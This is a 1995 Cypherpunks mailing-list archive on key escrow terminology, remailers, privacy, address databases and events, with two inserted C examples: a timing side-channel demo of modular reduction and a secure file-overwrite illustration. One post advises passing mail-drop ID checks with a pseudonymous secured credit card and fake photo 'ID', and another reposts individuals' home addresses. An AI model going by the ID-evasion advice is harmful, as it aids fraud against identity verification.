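        if (c.reduce_steps < lo) lo = c.reduce_steps;
        if (c.reduce_steps > hi) hi = c.reduce_steps;
    }
    return hi - lo;
}

int main(void)
{
    printf("step spread, data-dependent reduction: %u\n",
           step_spread(reduce_variable, 0xB1, 65521));
    printf("step spread, fixed-step reduction:     %u\n",
           step_spread(reduce_fixed, 0xB1, 65521));
    return 0;
}
```

Exponents of equal length and weight give identical squaring and multiply
counts, so the totals reveal only the density of 1 bits; the per-operand
variation appears only with the data-dependent reduction.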




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 15 Dec 1995 21:12:33 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <2.2b8.32.19951215121704.0089daa8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:20 PM 12/14/95 EDT, E. ALLEN SMITH wrote:

>	The more critical question is likely to be what the people at the local
>MBE/whatever _think_ the rules are. When I last got a box (under my real name,
>in case anyone's wondering), I seem to recall that they'd accept credit cards.
>Once one has one box under a given name, this opens up the possibility of
>getting a secured credit card to make future access easier. However, I believe
>that they do want at least one form of photo ID; I can't remember just off what
>their specifications were.
>	-Allen

I have found that credit cards are very good ID (even though they aren't ID
at all) since people are sure that you can't get one without getting
thoroughly checked out.  A secured credit card in a nom de guerre backed up
with employment photo "ID" will usually get you what you want.

The reason that market access controls like these break down is that they
are dependent on every seller on earth giving up the profit involved in
selling to you.  Sellers are different.  You can usually find one who
doesn't check ID well or is in another jurisdiction (in the case of non
physical transactions).  

A new effect is the spread of libertarian (small L) political ideologies
which means that a growing group of market participants are philosophically
opposed to traditional control regimes.  Eg C2.ORG.

A final problem for control freaks is that Friction Free Capitalism is
eating away at the traditional market institutions that have grown up during
the control era.  Thus if traditional banking, telephony, and electricity
distribution are wiped out by new forms of competitive business activity it
is hard for regulatory agencies to extend their traditional controls to the
new entities.  Budget restraints play a part as does inertia.  All of this
is before the new market players deploy anti control technologies and
procedures.  They are in business because they can displace traditional
quasi-monopoly institutions and often see government as just another
competitor to be bypassed.

DCF 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 16 Dec 1995 02:13:52 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <199512150601.HAA14657@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951215074709.4512A-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 15 Dec 1995, Anonymous wrote:

>       You don't get it, do you?
> 
> 
> Sandfort A & K
> Irvine, CA  92714
> . . .
> Sandfort Weldon W
> 407 Rock St
> Dardanelle, AR  72834-3402
> 
> 
>       This took about a minute using a shabby consumer-level DB.
>       *Now* do you get it?

Nope.  MY name isn't on your list.  In addition, my home phone
number is unlisted--therefore contractually unavailable for 
resale.  *Now* do you get it?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 15 Dec 1995 23:15:59 +0800
To: cypherpunks@toad.com
Subject: Re: "Strongly Voluntary" Key Escrow
Message-ID: <199512151412.JAA30648@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim wrote:

<snip>

>All of these are "voluntary" key escrow (though I hate that misuse of the
>word "escrow") [...]

I do too, and I hate it enough that I must (again) object to any use of
it where there is not a _NEUTRAL_, _THIRD_ party involved, as explained
before on the list (at length) by me, James A. Donald, and many others.

[So, why are you *again* consuming bandwidth on this subject, Jim?]

Because I love the English language, and because I am quite aware that
those who define the terms end up winning the debate, every time. I do
not want the word "escrow" in a key context to go the way of the word
"voluntary" in an income-tax context (or the word "take" in an enviro-
law context). The government has snaked in a Newspeak meaning for the
latter two terms, but I hope that cypherpunks will only use the term
"GAK" when talking to or about the government. Failure to do so will
not only put "our side" in a worse public-relations position, it may
(in the future) do violence to the English language. While I enjoyed
Tim & Uni's "voluntary" sarcasm, I think we have enough material for
*ample* humor without adding even more words to the Newspeak roll.

<snip>

>there are few circumstances where I think "government certification"

"Government Key Certification" might be an OK compromise-term compared
to "key escrow," but we should [IMNSHO] continue to stick to "GAK." As
you know, I preferred the term "FUCKED," but now we must be "decent" in
our communications. <sigh>

>is even useful, let alone necessary.

I can think of only two, but perhaps there are others:
1. Government employees (but only while working on government time).
2. Convicted felons (I wouldn't include the failed drugwar's felons).

>Any scheme in which the government interjects itself in what would not
>normally involve them can hardly be said to be strictly voluntary.

Indeed, but we have already "lost" the word "voluntary" to Newspeak,
which is why it's necessary to qualify it with words like "strictly"
and "strongly."
JMR
- ----------------------------------------------------------------------
Regards, Jim Ray
http://www.shopmiami.com/prs/jimray
"Thank God we don't get all the government we pay for." -- Will Rogers
[Said back when we paid for (and got) a  _lot_  less government.]
- -----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35  <liberty@gate.net>  IANAL
- -----------------------------------------------------------------------
Help Phil! e-mail zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMNF6U21lp8bpvW01AQGhXwP/ZDmtjY77AnAnnmddpd/rX93E4nGm7JBg
8KXyM7TGiiifpPfLRLJR3LncS0OE7V6CIcaq6zSox+qK97SfNZJhwP+GUIMegChJ
WiqIaU5el2x6n0KeD/Km4loXMah6o4q4RJyVyo/M3uLlvYsBUyi9i4MQHy6fHpdU
BSBnPIz0j0w=
=9K29
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Fri, 15 Dec 1995 22:57:41 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <199512150303.VAA10066@cdale1.midwest.net>
Message-ID: <199512151411.JAA24231@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


andr0id@midwest.net writes:
> 
> >  The best way to circumvent something like the below occurring is to have
> >your home phone number listed under a pseudonym with no street address listed
> >and block out *69 and caller-id.  If some entity wants your phone number,
> >give them your business number.
> 
> Another "best way" is to make all calls that you want to be personal with
> a cellular phone.  Most cellular systems don't send ANI and do not provide
> any type of billing information to the phone company.  The number is also by
> nature unlisted and the only way to get it is by you or the cellular 
> carrier.  If the cellular carrier gives your number out without your
> permission or a court order they are in BIG trouble.

My untrained brain sees two problems with this:

1) Cellular systems are inherently less secure than standard telephones,
as anyone who can afford a decent scanner can listen to your conversations
at will.

2) You're relying on someone other than yourself to protect your security,
which is always a bad idea. Cellular carriers, Ma Bell, anyone. Does anyone
on this list really believe that representatives of these organizations
would think twice about bending over and spewing out everything they know
about you? They do it all the time, without your permission and without
valid court orders. 


-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
 EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona
   Hate, hate your enemies  save, save your friends  find, find your place
 I feel a groove comin' on | speak..speak the truth | Freedom...yeah, right.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jps@monad.semcor.com (Jack P. Starrantino)
Date: Fri, 15 Dec 1995 23:10:08 +0800
To: cypherpunks@toad.com
Subject: Re: Secured RM ? (source)
In-Reply-To: <Pine.LNX.3.91.800121064335.1068A-100000@HellSpawn.gate.net>
Message-ID: <9512151425.AA07871@monad.semcor.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't think this will work. When you

> if ( (Pfp = fopen(Pfilename, "wb") ) == NULL)

the file will be truncated. Subsequent writes could be anywhere on the
platter; you're building a new file.

I think you can work this way if you open the file for read/write
access, although I'd be more inclined to take the file name into the
directory and then walk the inodes.

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps@semcor.com
Suite C-100
Warminster, PA 18974
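The point made in the message above, as an added example (not the code under discussion in the thread): opening with "wb" discards the old contents before a single byte is written, while opening with "r+b" keeps the file's length and lets the overwrite go through the existing file. The function names, the sample contents and the file name are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample contents standing in for the data to be wiped. */
static const char SAMPLE[] =
    "constructed secret: not real data, 0123456789abcdef\n";

/* Create (or recreate) the sample file. Returns 0 on success. */
int make_sample(const char *path)
{
    FILE *f = fopen(path, "wb");
    if (!f) return -1;
    size_t want = sizeof SAMPLE - 1;
    size_t got = fwrite(SAMPLE, 1, want, f);
    if (fclose(f) != 0 || got != want) return -1;
    return 0;
}

/* Length of the file in bytes, or -1 on error. */
long file_length(const char *path)
{
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    long n = (fseek(f, 0, SEEK_END) == 0) ? ftell(f) : -1;
    fclose(f);
    return n;
}

/* What the quoted fopen(..., "wb") does: the file is truncated to zero
   length at open time, so later writes build a new file. */
long length_after_wb_open(const char *path)
{
    FILE *f = fopen(path, "wb");   /* old contents are discarded here */
    if (!f) return -1;
    fclose(f);
    return file_length(path);
}

/* Overwrite every byte of an existing file without truncating it.
   Standard C only: fflush hands the data to the OS, and whether the
   filesystem then reuses the original blocks is outside this code. */
int overwrite_in_place(const char *path, unsigned char fill)
{
    FILE *f = fopen(path, "r+b");  /* read/write, existing data kept */
    if (!f) return -1;
    if (fseek(f, 0, SEEK_END) != 0) { fclose(f); return -1; }
    long remaining = ftell(f);
    if (remaining < 0 || fseek(f, 0, SEEK_SET) != 0) { fclose(f); return -1; }

    unsigned char buf[4096];
    memset(buf, fill, sizeof buf);
    int rc = 0;
    while (remaining > 0) {
        size_t chunk = remaining < (long)sizeof buf ? (size_t)remaining
                                                    : sizeof buf;
        if (fwrite(buf, 1, chunk, f) != chunk) { rc = -1; break; }
        remaining -= (long)chunk;
    }
    if (fflush(f) != 0) rc = -1;
    if (fclose(f) != 0) rc = -1;
    return rc;
}

/* 1 if every byte in the file equals fill, 0 if not, -1 on error. */
int all_bytes_equal(const char *path, unsigned char fill)
{
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    int c, ok = 1;
    while ((c = fgetc(f)) != EOF)
        if ((unsigned char)c != fill) { ok = 0; break; }
    fclose(f);
    return ok;
}

int main(void)
{
    const char *path = "wipe_demo.tmp";   /* constructed file name */

    if (make_sample(path) != 0) return 1;
    printf("original length:        %ld\n", file_length(path));
    if (overwrite_in_place(path, 0x00) != 0) return 1;
    printf("after r+b overwrite:    %ld (all zero: %d)\n",
           file_length(path), all_bytes_equal(path, 0x00));

    if (make_sample(path) != 0) return 1;
    printf("after fopen(\"wb\") only: %ld\n", length_after_wb_open(path));
    remove(path);
    return 0;
}
```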




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 16 Dec 1995 02:47:41 +0800
To: cypherpunks@toad.com
Subject: Re: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
Message-ID: <199512151800.KAA11304@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Dec 1995, Michael Coates wrote:

> PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
> Netscape Communications has awarded two software sleuths $1,000 each for
> finding security gaps in its Netscape Navigator 2.0 software.  The company
> also awarded gifts to 50 other contestants in its "Bugs Bounty" program for
> identifying non-security problems.  (Wall Street Journal 11 Dec 95 B7)

Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000
from Netscape for finding the HUGE security flaws in Netscape's existing 
product line??

I can't remember whether they got anything or not ...

(Sorry, but I've been away from the list.  One of those, "fate of the 
Free World hangs in the balance" thingies ... ;-)

Have Netscape and AT&T shown some holiday goodwill, or are they still 
engaged in their felonious freeloading foolishness?



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 15 Dec 1995 18:22:45 +0800
To: cypherpunks@toad.com
Subject: Re: mailing list
Message-ID: <199512150910.KAA21650@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On 15 Dec 95 at 1:13, JerelRobertson wrote:

> Hey I want to get on this list.  How do I do it?

There's a test, Jerel.  You may retake it in three months.

We











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 16 Dec 1995 02:11:18 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: [NOISY] Re: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy
In-Reply-To: <Pine.ULT.3.91.951214232857.10286G-100000@Networking.Stanford.EDU>
Message-ID: <Pine.BSF.3.91.951215102324.2719A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Dec 1995, Rich Graves wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> My friend Clark wrote:
> 
> >Thanks (belatedly) for posting this, Russell.  Who was it said, "Follow the
> >money."
> 
> I believe that was Woodward & Bernstein. They were referring to some
> right-wing wackos who had flagrantly broken the law investigating their
> political opposition, then very sloppily tried to cover it up. Woodward &
> Bernstein brought down a President. I think they're cool (though they seem
> to have rested on their laurels, and their subsequent work is less
> impressive). 
> 
Actually, I think it was Woodward's source, "Deep Throat," who said 
"Follow the money."

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 16 Dec 1995 04:49:12 +0800
To: cypherpunks@toad.com
Subject: Re: .PWL spin
Message-ID: <199512151829.KAA13449@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Dec 1995, Joel McNamara wrote:

> One system administrator said the problem would have a greater effect on
> less-secure environments, such as universities and other institutions,
> than on corporations.

I didn't quite understand the "corporate speak" here.  It sounds like
something coming from Bosnia or something.  It's Greek to me.

What would make a University less secure than a corporation??

Universities (at least the ones I've checked) have entire departments
and theoreticians devoted to Computers ... companies usually don't.  

I'd think that Universities are much, much more secure environments than
corporations are.  Doesn't Microsoft know this??  Or is this unique to
Seattle?? 



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 16 Dec 1995 04:00:16 +0800
To: cypherpunks@toad.com
Subject: Re: And the standard continues to lower...
Message-ID: <199512151846.KAA14526@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Dec 1995, Peter Trei wrote:

> This guy's home page is a hoot - he's into UFO contacts and dolphin
> communication.
> 
> After writing to him and getting back a description of his system, it's
> clear that he's clueless. He seems to think that info sent to a vendor
> using his system can't be sorted out from the gazillion other packets
> on the Net. 
> 
> I described to him sniffer attacks, subverted routers, et al., and
> recommended some basic reading (Cheswick & Bellovin, 

Is this the two partners in crime from AT&T??  Cheswick & Bellovin??

I think that they're probably not all that reputable (or knowledgeable)
from what I've seen of their writings and contributions to the AT&T DSRP 
(Data Security Response Program) mailing list. 

(If they are the same people, I mean ...)

> Kaufmann, Perlman, & Speciner, and Schneier). He said he'd
> look into it. (Yes, I know there's plenty of other attacks, such as
> OSPF spoofing, but I didn't describe them).
> 
> I think we can educate this guy. 

Plenty of educating can probably be done, I think.



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: john.ellis@wmcmail.wmc.ac.uk
Date: Sat, 16 Dec 1995 20:33:31 +0800
To: andreas@artcom.de>
Subject: Algorithims ?
Message-ID: <9511158190.AA819065181@wmcmail.wmc.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


     Where can I get a set of the most popular algorithms for 
     encryption, and does anyone have any info on the algorithm used in 
     the Second World War by the Germans (the Enigma system)? Any info would be 
     gratefully received.
     
     Cheers John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 16 Dec 1995 02:05:01 +0800
To: cypherpunks@toad.com
Subject: DCSB: Future Scenarios for e$
Message-ID: <v02120d0facf746b17af7@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

                 The Digital Commerce Society of Boston
            (Formerly The Boston Society for Digital Commerce)

                               Presents

                      Art Hutchinson and John Kelly
                Northeast Consulting Resources Inc., (NCRI)

                      "Future Scenarios for e$"


                        Tuesday, January 2, 1995
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Mr. Hutchinson is a Senior Consultant at Northeast Consulting Resources,
Inc. (NCRI).  His primary area of focus is NCRI's Information Commerce
practice. He has advised clients on the application of different approaches
to, and technologies for managing (and getting paid for) digital
intellectual property on the Internet, the World Wide Web, and
private/hybrid networks.

Mr. Hutchinson is an active member of the Electronic Rights Management Group
of the Information Industry Association, and a founding member of the
Digital Commerce Society of Boston.  He speaks regularly at conferences on
the topic of rights management in cyberspace.  He is a principal contributor
to NCRI's Future Mapping(r) conferences, including "The Future of
Information Commerce" and "The Great Infrastructure Debate"(r).  Prior to
joining NCRI, Mr. Hutchinson was Director of Consulting Services at BIS
Strategic Decisions. Prior to BIS, Mr. Hutchinson managed the Distribution
Channels Information Service at International Data Corp. (IDC).


Mr. Kelly, a Senior Consultant at Northeast Consulting Resources, Inc.
(NCRI), has specialized in designing group planning and decision making
activities that help teams clarify their strategic options.  He also
analyzes new applications in multimedia training and groupware.  He is one
of the leaders of the Mapping the Future of Information Commerce seminars.

Mr. Kelly has led seminars on strategic planning and Future Mapping for a
large international oil company, a Fortune 100 diversified manufacturing
company, a leading computer hardware and systems company, and numerous
software and telecommunications companies.  He has contributed to the
development of databases of critical events that help companies chart their
future business opportunities in the areas of computing, communications, and
interactive multimedia. Before joining NCRI, Mr. Kelly served as an
Associate Editor and consultant for the Seybold Office Computing Group. Mr.
Kelly also worked for the Information Systems Group at Lotus Development
Corporation and was the Director of Interactive Technology Projects at the
WGBH Educational Foundation. Prior to that, Mr. Kelly was Manager of the
Seminar Division at Information Mapping, Inc. and later served as a
consultant to IMI.


Art says:

>Art Hutchinson and John Kelly of Northeast Consulting Resources, Inc. (NCRI)
>will facilitate an interactive exercise that helps to paint a picture of the
>group's collective thinking about future events and milestones
>in the development of electronic commerce.  Specifically, we will be culling
>through the last year of posts to www-buyinfo, e-payment, and various other
>mailing lists, as well as our own database of 17,000 "events" used in
>previous scenario planning conferences.  From this, we will create a set
>of about 40 potential future events which - depending upon whether they
>happen or not - will drive the digital commerce arena in varying directions.
>
>
>Everyone at the lunch will be given an opportunity to 'vote' on and discuss
>with their peers the likelihood (or un-likelihood) of these events happening
>within a particular time frame.  After the 'voting', we will lead a
>discussion of what the results might mean, and how some things that this
>group believes correspond to what other corporate and industry groups have
>said in the recent past in voting on some of the same events.  Suggestions
>for controversial, interesting, watershed events that might happen in the
>digital commerce arena over the next 3-5 years are welcome.  Please e-mail
>them directly to Art Hutchinson at <hutchinson@ncri.com>

This meeting of the Boston Society for Digital Commerce will be held on
Tuesday, January 2, 1995 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by Saturday,
December 30 (that's two weeks from this Saturday), or you won't be on the list
for lunch. Checks payable to anyone else but The Harvard Club of Boston will
have to be sent back.

Checks should be sent to Robert Hettinga, c/o The Shipwright Development
Corporation, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they
must be made payable to "The Harvard Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with a few glacial A/P departments ourselves, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 February    Fred Hapgood     Freelance Author
 March       Glenda Barnes    X.9 Electronic Commerce Security Group
 April       Donald Eastlake  CyberCash
 May         Perry Metzger    Security Consultant and Cypherpunk
 June        Dan Shutzer      FSTC

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Committee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Boston Society for Digital Commerce, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Bob Hettinga
Moderator,
The Digital Commerce Society of Boston



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNGdJPgyLN8bw6ZVAQGSgQP/Q5PfwoevxNRBaC1B6dUaIDl07bhGTpSm
v9pYx3kuHTEc0Mei3Zzxj4G/yaSGFHoOuz8rslxsKBIrsLeB0Xc7gehs8OjgXsuU
fcR6gvT4mlY9Mvs8E9MaeTlTlHAz5R38g1lv1ST4Xti7kBQ4l9EEErTjPOM4oHy/
6kglzZsCSM4=
=QJbV
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DANIEL CHARPENTIER <drcharpe@hamlet.uncg.edu>
Date: Sat, 16 Dec 1995 02:06:34 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Algorithims
In-Reply-To: <9511158190.AA819065181@wmcmail.wmc.ac.uk>
Message-ID: <Pine.SOL.3.91.951215113602.23438B-100000@hamlet>
MIME-Version: 1.0
Content-Type: text/plain





       For information on Enigma try "APPLIED CRYPTOGRAPHY"
by Bruce Schneier page 11 and 364.  Page 11 gives a brief
summary of it and provides some info and other material
covering it.  Page 364 does the same.  In case you do not
have access to the book ( which of course is a sin ) here are
some of the references.

       "THE CODEBREAKERS" by D. Kahn    1983
       "CRYPTANALYSIS of the HAGELIN CRYPTOGRAPH" by W.G. Barker  1977
       "THE BLACK CHAMBER: A COLUMN; HOW THE BRITISH BROKE ENIGMA" by
    C.A. Deavours    Cryptologia, v.4,n.3,Jul 1980,pp 129-132





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 16 Dec 1995 04:58:42 +0800
To: <cypherpunks@toad.com
Subject: Re: And the standard continues to lower...
Message-ID: <9512151643.AA12546@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



 At 05:17 PM 12/13/95 -0600, you wrote:
>Dr. Brian L. Crissey includes in his .sig, courtesy of cactus@hks.net
>>[ much WRT YetAnotherSecureInternetCreditCardPaymentSystem(*tm) deleted ]
>> ***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128
>> (503)-434-2426 brianc@linfield.edu
>> Professionals built the Titanic, amateurs built the Ark...
>
>However, the Ark was *designed* by GOD (if you believe the story).  Can Dr.  
>Brian L. Crissey say the same thing about his payment system?

This guy's home page is a hoot - he's into UFO contacts and dolphin
communication.

After writing to him and getting back a description of his system, it's
clear that he's clueless. He seems to think that info sent to a vendor
using his system can't be sorted out from the gazillion other packets
on the Net. 

I described to him sniffer attacks, subverted routers, et al., and
recommended some basic reading (Cheswick & Bellovin, 
Kaufmann, Perlman, & Speciner, and Schneier). He said he'd
look into it. (Yes, I know there's plenty of other attacks, such as
OSPF spoofing, but I didn't describe them).

I think we can educate this guy. 

speaking only for myself,
Peter Trei  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Sat, 16 Dec 1995 02:44:29 +0800
To: cypherpunks@toad.com
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <9511158190.AA819055487@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     Obviously, we need a certificate authority that will digitally sign 
     personal identification documents (Name, address, photo (digitized), 
     date of birth, etc.)
     
     Martin G. Diehl


______________________________ Forward Header __________________________________
Subject: Re: e-mail forwarding, for-pay remailers
Author:  "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu> at Internet-USA
Date:    12/13/95 5:33 PM


From: IN%"gbroiles@darkwing.uoregon.edu"  "Greg Broiles" 13-DEC-1995 03:40:50.49
     
>I don't have much faith that the people who are currently doing the DNS 
for my domain name (goldenbear.com) are going to do anything about the
current bouncing-messages phenomenon anytime soon, so I'm looking into other 
ways to get & send E-mail 
[snip]
     
netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage 
or forwarding for people; 
[snip]
       There's one problem with this in regards to the "no necessary
connection," and that's the governmental requirement for mail forwarding. MBE 
and any legal other one will want to see at least two forms of ID including one 
photo, and have a form that they fill out using that and send to the local
post office. Anyone have a way around this problem?
       -Allen

The following is an attached File item from cc:Mail.  It contains
information that had to be encoded to ensure successful transmission
through various mail systems.  To decode the file use the UUDECODE
program.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Fri, 15 Dec 1995 20:29:58 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <Pine.SUN.3.91.951214144159.12822D-100000@crl.crl.com>
Message-ID: <30d162b0.1566429@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Dec 1995 14:50:19 -0800 (PST), Sandy Sandfort wrote:

> So far, no one has come up with anything stronger than specula-
> tion about my database question.  Some "anonymous" told me how
> easy it was to buy *phone numbers* on CD-ROMs.  Great, but I
> didn't give the guy my phone number.

These CD-ROMs can be searched for most any combination of name, street
name, city, state, zip and area code.

Given a relatively uncommon name and a zip code, it's not surprising
they could come up with only one hit.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Sat, 16 Dec 1995 04:07:51 +0800
To: cypherpunks@toad.com
Subject: Encrypted telnet...
Message-ID: <9512151848.AA20590@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



I am looking for an encrypted telnet (or rlogin/etc) package
that supports a Windoze client.  

It looks like all the normal ones that I can find 
(SSH, SRA telnet, SSLtelnet, etc) are just under Unixoids.  
Don't get me wrong - I would prefer to use Unix, but I am
headed off to locations, where I know all I'll have access to 
is Windows, with a PPP stack to some ISP.

I'd write it myself - pasting different packages together,
but I need it working in a day or two.  Can anyone help me here?  


Thanks,
Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 16 Dec 1995 06:49:01 +0800
To: cypherpunks@toad.com
Subject: Re: "Strongly Voluntary" Key Escrow
Message-ID: <199512152102.NAA27308@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:10 12/15/95 -0500, Jim Ray wrote:
>"Government Key Certification" might be an OK compromise-term compared
>to "key escrow," but we should [IMNSHO] continue to stick to "GAK." As
>you know, I preferred the term "FUCKED," but now we must be "decent" in
>our communications. <sigh>

I suggest Forced Key Deposit (FKD) (when some non-governmental entity e.g.
an employer forces you to send copies of your keys to some depository), and
Voluntary Key Deposit (VKD), when you choose to deposit a copy of your key
with some third party.  I love the way GAK sounds, so I support it even the
whole concept is really FUCKED.  Whenever I hear, "Government Key
Certification", I think of digital signatures, not communication privacy.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sat, 16 Dec 1995 09:46:59 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: NET - HLR on highway privacy (fwd)
Message-ID: <Pine.SUN.3.91.951215135340.12467B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


I hadn't seen this cross the list yet...

------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.

---------- Forwarded message ----------
Date: Mon, 11 Dec 1995 05:59:53 -0600
